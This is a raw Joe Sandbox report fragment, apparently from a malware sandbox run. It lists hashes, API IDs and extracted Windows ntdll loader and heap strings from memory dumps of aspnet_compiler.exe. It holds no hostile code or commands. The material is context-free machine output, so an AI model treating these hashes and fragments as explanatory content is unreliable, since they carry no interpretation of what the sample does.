                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ExitProcess
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 621844428-0
                                                                                                                                                          • Opcode ID: 29205141e20994605a55deee26b2df85bd7a3aaca56f5563100d8efa15c00275
                                                                                                                                                          • Instruction ID: 5b3de0624fe0a28c818fb70999a8e3532c71153bdfbe5aac28f931c41c5855af
                                                                                                                                                          • Opcode Fuzzy Hash: 29205141e20994605a55deee26b2df85bd7a3aaca56f5563100d8efa15c00275
                                                                                                                                                          • Instruction Fuzzy Hash: 10E086352402147BC610EB5ADC41F9B776CDFC5714F108419FA0CA7181C671BA1487F4

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 402 1092c0a-1092c0f 403 1092c1f-1092c26 LdrInitializeThunk 402->403 404 1092c11-1092c18 402->404
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                          • Opcode ID: eb5e2c7d5b9bfb8c91e983d935f37447737de0718e461d41310d63120d220f43
                                                                                                                                                          • Instruction ID: 528b5f0fb4abad2e016703dfbc173ca70aadcbb32d6789c82e8ace61873b3288
                                                                                                                                                          • Opcode Fuzzy Hash: eb5e2c7d5b9bfb8c91e983d935f37447737de0718e461d41310d63120d220f43
                                                                                                                                                          • Instruction Fuzzy Hash: 3BB09BB1D055C5D5EF51E7E44618717794077D0701F55C062D2430651F8738D1D1F275
                                                                                                                                                          Strings
                                                                                                                                                          • Go determine why that thread has not released the critical section., xrefs: 01108E75
                                                                                                                                                          • *** Resource timeout (%p) in %ws:%s, xrefs: 01108E02
                                                                                                                                                          • *** Inpage error in %ws:%s, xrefs: 01108EC8
                                                                                                                                                          • The critical section is owned by thread %p., xrefs: 01108E69
                                                                                                                                                          • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 01108F34
                                                                                                                                                          • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 01108F26
                                                                                                                                                          • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 01108DB5
                                                                                                                                                          • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 01108F2D
                                                                                                                                                          • *** A stack buffer overrun occurred in %ws:%s, xrefs: 01108DA3
                                                                                                                                                          • The resource is owned shared by %d threads, xrefs: 01108E2E
                                                                                                                                                          • read from, xrefs: 01108F5D, 01108F62
                                                                                                                                                          • write to, xrefs: 01108F56
                                                                                                                                                          • This failed because of error %Ix., xrefs: 01108EF6
                                                                                                                                                          • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 01108E3F
                                                                                                                                                          • The instruction at %p tried to %s , xrefs: 01108F66
                                                                                                                                                          • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 01108E86
                                                                                                                                                          • *** then kb to get the faulting stack, xrefs: 01108FCC
                                                                                                                                                          • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 01108E4B
                                                                                                                                                          • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 01108DC4
                                                                                                                                                          • *** enter .exr %p for the exception record, xrefs: 01108FA1
                                                                                                                                                          • The instruction at %p referenced memory at %p., xrefs: 01108EE2
                                                                                                                                                          • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 01108DD3
                                                                                                                                                          • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 01108FEF
                                                                                                                                                          • <unknown>, xrefs: 01108D2E, 01108D81, 01108E00, 01108E49, 01108EC7, 01108F3E
                                                                                                                                                          • *** enter .cxr %p for the context, xrefs: 01108FBD
                                                                                                                                                          • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 01108D8C
                                                                                                                                                          • *** An Access Violation occurred in %ws:%s, xrefs: 01108F3F
                                                                                                                                                          • The resource is owned exclusively by thread %p, xrefs: 01108E24
                                                                                                                                                          • an invalid address, %p, xrefs: 01108F7F
                                                                                                                                                          • a NULL pointer, xrefs: 01108F90
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                                                                                                                                          • API String ID: 0-108210295
                                                                                                                                                          • Opcode ID: d2d1ab021984c3dfbcd2c09d0b39cee423a0c8b3f8df896aff4cc46628bf79ff
                                                                                                                                                          • Instruction ID: bea0d7374936c67e1f7764422a37d8c5c1b96bef7e97f2a72ae9d0145f4d9cb2
                                                                                                                                                          • Opcode Fuzzy Hash: d2d1ab021984c3dfbcd2c09d0b39cee423a0c8b3f8df896aff4cc46628bf79ff
                                                                                                                                                          • Instruction Fuzzy Hash: 65810BB9E44225BFDB1A9A19CC85EBB3B35EF56710F054058F2895F192E3F18811CB62
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                                                                                                          • API String ID: 0-2160512332
                                                                                                                                                          • Opcode ID: 217992627d38281d13063aa168d6bb0ea3c2942e0859ec16e8c5e2b5ac0954b8
                                                                                                                                                          • Instruction ID: 91de447d0447a089c754daff0026224545326f2e1158819303e7e203b93b3c85
                                                                                                                                                          • Opcode Fuzzy Hash: 217992627d38281d13063aa168d6bb0ea3c2942e0859ec16e8c5e2b5ac0954b8
                                                                                                                                                          • Instruction Fuzzy Hash: 54926C71608346AFE725DE28C880BABB7E8BF84754F04496DFAD4DB251D770E844CB92
                                                                                                                                                          Strings
                                                                                                                                                          • double initialized or corrupted critical section, xrefs: 010C5508
                                                                                                                                                          • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 010C54E2
                                                                                                                                                          • Address of the debug info found in the active list., xrefs: 010C54AE, 010C54FA
                                                                                                                                                          • 8, xrefs: 010C52E3
                                                                                                                                                          • corrupted critical section, xrefs: 010C54C2
                                                                                                                                                          • undeleted critical section in freed memory, xrefs: 010C542B
                                                                                                                                                          • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 010C54CE
                                                                                                                                                          • Critical section address., xrefs: 010C5502
                                                                                                                                                          • Invalid debug info address of this critical section, xrefs: 010C54B6
                                                                                                                                                          • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 010C540A, 010C5496, 010C5519
                                                                                                                                                          • Critical section address, xrefs: 010C5425, 010C54BC, 010C5534
                                                                                                                                                          • Thread identifier, xrefs: 010C553A
                                                                                                                                                          • Critical section debug info address, xrefs: 010C541F, 010C552E
                                                                                                                                                          • Thread is in a state in which it cannot own a critical section, xrefs: 010C5543
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                                                                                                          • API String ID: 0-2368682639
                                                                                                                                                          • Opcode ID: e78117ff42ab74f5466546b6a388140398eeeac782987dc8536f2fe549a3ae86
                                                                                                                                                          • Instruction ID: 7bd3e1d429b3b6a365ffce05af013b7bf5dcc0d61eb77042356b99de52e387b1
                                                                                                                                                          • Opcode Fuzzy Hash: e78117ff42ab74f5466546b6a388140398eeeac782987dc8536f2fe549a3ae86
                                                                                                                                                          • Instruction Fuzzy Hash: 1D818CB4A00359AFDB60CF99CC45BAEBBF9BB48B14F10819EF584BB640D771A940CB50
                                                                                                                                                          Strings
                                                                                                                                                          • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 010C2624
                                                                                                                                                          • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 010C2498
                                                                                                                                                          • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 010C2506
                                                                                                                                                          • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 010C2602
                                                                                                                                                          • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 010C2412
                                                                                                                                                          • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 010C25EB
                                                                                                                                                          • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 010C22E4
                                                                                                                                                          • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 010C2409
                                                                                                                                                          • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 010C24C0
                                                                                                                                                          • RtlpResolveAssemblyStorageMapEntry, xrefs: 010C261F
                                                                                                                                                          • @, xrefs: 010C259B
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                                                                                                          • API String ID: 0-4009184096
                                                                                                                                                          • Opcode ID: 7ecc2a32161704b0c4c1c30110338fa6d6c4771f40d182095db62d7f045919fb
                                                                                                                                                          • Instruction ID: 35c15f35b9d869d143f8776ba90d138ac2f9e10ed02e86e508d008e8073a7beb
                                                                                                                                                          • Opcode Fuzzy Hash: 7ecc2a32161704b0c4c1c30110338fa6d6c4771f40d182095db62d7f045919fb
                                                                                                                                                          • Instruction Fuzzy Hash: B2026FF1D0422D9FDB61DB54CD80BEEB7B8AF54704F0041EAA689A7241DB709E84CF69
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                                                                                                          • API String ID: 0-2515994595
                                                                                                                                                          • Opcode ID: 38d618e986c259e5fb4d5238fa3ffedec6333954db6c003bbfce787937ad27a9
                                                                                                                                                          • Instruction ID: e1a77a2d2d73cb72c04f8ff99e4db6b88208946ff268ba915f54f23a2257d39a
                                                                                                                                                          • Opcode Fuzzy Hash: 38d618e986c259e5fb4d5238fa3ffedec6333954db6c003bbfce787937ad27a9
                                                                                                                                                          • Instruction Fuzzy Hash: 0651DF715053169BD329DF19C84ABEBBBE8BF94240F14891EEAD8C3681E770D508CBD2
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: DLL name: %wZ$DLL search path passed in externally: %ws$LdrGetDllHandleEx$LdrpFindLoadedDllInternal$LdrpInitializeDllPath$Status: 0x%08lx$minkernel\ntdll\ldrapi.c$minkernel\ntdll\ldrfind.c$minkernel\ntdll\ldrutil.c
                                                                                                                                                          • API String ID: 0-3197712848
                                                                                                                                                          • Opcode ID: 98f40dc0eedea1f0765e821b33ba6f8af2315237222f9deb7ca5908e6e2ea016
                                                                                                                                                          • Instruction ID: d0b29cd84be10a69fe010ea158194ec45df08708db82d657d16e44c11eb3b143
                                                                                                                                                          • Opcode Fuzzy Hash: 98f40dc0eedea1f0765e821b33ba6f8af2315237222f9deb7ca5908e6e2ea016
                                                                                                                                                          • Instruction Fuzzy Hash: 7F12C1B1609341CFD365EF18C880BAABBE8BF94B08F04456EF9C59B291E774D944CB52
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                                                                                          • API String ID: 0-1700792311
                                                                                                                                                          • Opcode ID: 40521fa0dd51d632695cae8d370af743372e02ea209112f8aa3267214ff3f095
                                                                                                                                                          • Instruction ID: 5ca09acc122b6315057f09719f078e2623af9461e0255f5d019f997add898278
                                                                                                                                                          • Opcode Fuzzy Hash: 40521fa0dd51d632695cae8d370af743372e02ea209112f8aa3267214ff3f095
                                                                                                                                                          • Instruction Fuzzy Hash: F5D1F335900685EFDB2ADFA8C440BADBBF1FF4A740F098069F4859B692C7B5D981CB14
                                                                                                                                                          Strings
                                                                                                                                                          • VerifierDebug, xrefs: 010D8CA5
                                                                                                                                                          • AVRF: -*- final list of providers -*- , xrefs: 010D8B8F
                                                                                                                                                          • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 010D8A3D
                                                                                                                                                          • HandleTraces, xrefs: 010D8C8F
                                                                                                                                                          • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 010D8A67
                                                                                                                                                          • VerifierFlags, xrefs: 010D8C50
                                                                                                                                                          • VerifierDlls, xrefs: 010D8CBD
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                                                                                                          • API String ID: 0-3223716464
                                                                                                                                                          • Opcode ID: a1ff25a4fb57c678e09f9a2ae7f8766548cf09021395ac8e49732e710fe3f838
                                                                                                                                                          • Instruction ID: 3acd5523141957b721d8d38945786f5a47eb6f4631924db25b5774a8e9a5c280
                                                                                                                                                          • Opcode Fuzzy Hash: a1ff25a4fb57c678e09f9a2ae7f8766548cf09021395ac8e49732e710fe3f838
                                                                                                                                                          • Instruction Fuzzy Hash: 45914571A04716EFD325EF288880F9B7BE9AF94B14F05846AFAC16F281D7309C40CB95
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                                                                                                          • API String ID: 0-1109411897
                                                                                                                                                          • Opcode ID: 61b9557377457d30b05b9138641b54ff0beacefa2a52c07a50f6ef762c201062
                                                                                                                                                          • Instruction ID: d90398f612d3c0033fe2e63e13e4469e313c8ca3e51967ee4d8163b31a970bf5
                                                                                                                                                          • Opcode Fuzzy Hash: 61b9557377457d30b05b9138641b54ff0beacefa2a52c07a50f6ef762c201062
                                                                                                                                                          • Instruction Fuzzy Hash: B3A23D74A0562A8FDBA4DF18C8887AEBBB5BF45304F1441E9D98EE7251DB349E85CF00
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                                                                                          • API String ID: 0-792281065
                                                                                                                                                          • Opcode ID: 32c27c3ad9946e7e76dcec688a5e6c7442a777eff39aa073fc91a34bba9e022d
                                                                                                                                                          • Instruction ID: e6c4225f9fc82d26da1dc4f138ce03d3f8cf0c402af20a26b35fd88749a03bbd
                                                                                                                                                          • Opcode Fuzzy Hash: 32c27c3ad9946e7e76dcec688a5e6c7442a777eff39aa073fc91a34bba9e022d
                                                                                                                                                          • Instruction Fuzzy Hash: 88913670B04715DBEB39EF58D865BAE7BA6BF41F24F11006CE9D0AB281DB719841CB90
                                                                                                                                                          Strings
                                                                                                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 010A9A11, 010A9A3A
                                                                                                                                                          • Loading the shim user DLL failed with status 0x%08lx, xrefs: 010A9A2A
                                                                                                                                                          • Building shim user DLL system32 filename failed with status 0x%08lx, xrefs: 010A99ED
                                                                                                                                                          • LdrpInitShimEngine, xrefs: 010A99F4, 010A9A07, 010A9A30
                                                                                                                                                          • Getting the shim user exports failed with status 0x%08lx, xrefs: 010A9A01
                                                                                                                                                          • apphelp.dll, xrefs: 01046496
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: Building shim user DLL system32 filename failed with status 0x%08lx$Getting the shim user exports failed with status 0x%08lx$LdrpInitShimuser$Loading the shim user DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                                                          • API String ID: 0-204845295
                                                                                                                                                          • Opcode ID: bffbb856a7b996d2e1d43bdd5b9f566288d8e4b81aede8ae5a9be2f946229ed2
                                                                                                                                                          • Instruction ID: 6186816b159f0c9daad8978c98672a15c7e47c4a5b65c88faa491f61141dd62f
                                                                                                                                                          • Opcode Fuzzy Hash: bffbb856a7b996d2e1d43bdd5b9f566288d8e4b81aede8ae5a9be2f946229ed2
                                                                                                                                                          • Instruction Fuzzy Hash: 035101B13083049FD724DF64C891AAB77E8FB84B48F40092EF5D59B160EB31E944CB92
                                                                                                                                                          Strings
                                                                                                                                                          • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 010C2180
                                                                                                                                                          • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 010C21BF
                                                                                                                                                          • SXS: %s() passed the empty activation context, xrefs: 010C2165
                                                                                                                                                          • RtlGetAssemblyStorageRoot, xrefs: 010C2160, 010C219A, 010C21BA
                                                                                                                                                          • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 010C219F
                                                                                                                                                          • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 010C2178
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                                                                                                          • API String ID: 0-861424205
                                                                                                                                                          • Opcode ID: ac3479047935da4423af160c56aab440a0fd5a7ff3a2597902970721c3df5b92
                                                                                                                                                          • Instruction ID: 755106cacaef307830267cf968cb2ca6e9e3b3c620be16329790e8f6bf7958b1
                                                                                                                                                          • Opcode Fuzzy Hash: ac3479047935da4423af160c56aab440a0fd5a7ff3a2597902970721c3df5b92
                                                                                                                                                          • Instruction Fuzzy Hash: C1313B76B4021577E711AB968C41F6F7A68EBE5E40F05405DBFC56B240D3709A01CAA0
                                                                                                                                                          Strings
                                                                                                                                                          • Unable to build import redirection Table, Status = 0x%x, xrefs: 010C81E5
                                                                                                                                                          • LdrpInitializeProcess, xrefs: 0108C6C4
                                                                                                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 0108C6C3
                                                                                                                                                          • LdrpInitializeImportRedirection, xrefs: 010C8177, 010C81EB
                                                                                                                                                          • minkernel\ntdll\ldrredirect.c, xrefs: 010C8181, 010C81F5
                                                                                                                                                          • Loading import redirection DLL: '%wZ', xrefs: 010C8170
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                                                                                                          • API String ID: 0-475462383
                                                                                                                                                          • Opcode ID: d469e5f8f7fa0b478d13bfcc234913417e8715ba3138ec036913810a2b8914ad
                                                                                                                                                          • Instruction ID: d431acac66468132e23974b4bd54d6eca5a3897725e8ede30efb64c5aa491647
                                                                                                                                                          • Opcode Fuzzy Hash: d469e5f8f7fa0b478d13bfcc234913417e8715ba3138ec036913810a2b8914ad
                                                                                                                                                          • Instruction Fuzzy Hash: 8C3124717483029FD224EF28D986E5E7BE4EFD4B14F04456CF9C1AB291E620EC04CBA6
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 01092DF0: LdrInitializeThunk.NTDLL ref: 01092DFA
                                                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01090BA3
                                                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01090BB6
                                                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01090D60
                                                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01090D74
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1404860816-0
                                                                                                                                                          • Opcode ID: 54839ea1b096839426fe8cb4441d82ff9c04723cef4130bbc8fa08932579c232
                                                                                                                                                          • Instruction ID: 6a449d6346dbbdae5d8592d0b4a431db8fa813520609a609cebd303ebae42ec2
                                                                                                                                                          • Opcode Fuzzy Hash: 54839ea1b096839426fe8cb4441d82ff9c04723cef4130bbc8fa08932579c232
                                                                                                                                                          • Instruction Fuzzy Hash: 90425A71900715DFDB61CF28C890BEAB7F9FF04314F1485A9E989AB245E770AA84DF60
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
